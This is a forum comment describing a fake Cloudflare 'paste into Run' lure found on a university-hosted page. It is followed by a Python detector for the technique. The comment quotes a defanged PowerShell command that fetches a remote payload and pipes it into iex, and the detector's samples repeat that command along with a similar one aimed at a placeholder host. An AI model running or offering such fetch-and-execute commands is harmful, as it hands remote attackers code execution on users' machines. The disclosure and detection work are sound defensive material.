archon810 8 hours ago

Has this phishing/infection vector been exposed yet? I visited a website of some professor hosted at a university. I was presented with the following Cloudflare message I've never seen before (image in linked tweet).

When I read the instructions, I had to do a double take. How many unsuspecting internet users would do this without thinking twice?

Win+R (run prompt), Ctrl+V (paste), Enter (execute).

What are we executing? This (I replaced . with [DOT]): powershell -w h "curl bronxy[DOT]cc/sign/in|iex"

Threat actors often use the "iex" command for its ability to launch both local and remote payloads. I curled the URL, and for me, it showed a Teams exe from MS (VirusTotal here: https://virustotal.com/gui/url/fb9945173e557129d38ccdf204622...), but I wonder if the response switches to something malicious sometimes.
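
Detection logic for the kind of command quoted in the post above, added here as an example and not part of the original comment: it flags PowerShell command lines that fetch remote content and pipe it into iex, and records whether a hidden-window flag is present. The function names and every sample line except the first are constructed for illustration; command lines are assumed to come from process-creation logging.

```python
import re

# Download commands and aliases usable from PowerShell (curl and wget are
# aliases for Invoke-WebRequest in Windows PowerShell 5.1).
DOWNLOAD = re.compile(
    r"\b(curl|wget|iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
POWERSHELL = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
# Any "-w... h..." pair; checked below as prefixes of -WindowStyle Hidden.
WINDOW_ARG = re.compile(r"(?:^|\s)[-/](w[a-z]*)\s+[\"']?(h[a-z]*)", re.I)


def hidden_window(cmd):
    """True if cmd carries -WindowStyle Hidden or an abbreviation such as -w h."""
    for flag, value in WINDOW_ARG.findall(cmd):
        if "windowstyle".startswith(flag.lower()) and "hidden".startswith(value.lower()):
            return True
    return False


def indicators(cmd):
    """Return the set of paste-and-run traits present in one command line."""
    checks = {
        "powershell": POWERSHELL.search(cmd),
        "hidden_window": hidden_window(cmd),
        "remote_fetch": DOWNLOAD.search(cmd),
        "iex": EXECUTE.search(cmd),
    }
    return {name for name, hit in checks.items() if hit}


def is_paste_and_run(cmd):
    """Flag PowerShell that fetches remote content and pipes it into iex."""
    return {"powershell", "remote_fetch", "iex"} <= indicators(cmd)


# The first line is the command quoted in the post (still defanged with [DOT]);
# the rest are constructed samples, including two benign ones.
SAMPLES = [
    'powershell -w h "curl bronxy[DOT]cc/sign/in|iex"',
    'powershell.exe -WindowStyle Hidden -c "irm https://host.example/a | Invoke-Expression"',
    'powershell -NoProfile -File C:\\Scripts\\backup.ps1',
    'curl.exe -o report.pdf https://host.example/report.pdf',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(is_paste_and_run(line), sorted(indicators(line)), line)
```

The hidden-window trait is reported but not required for a match, since the fetch-then-iex pattern is the part that runs unreviewed remote content.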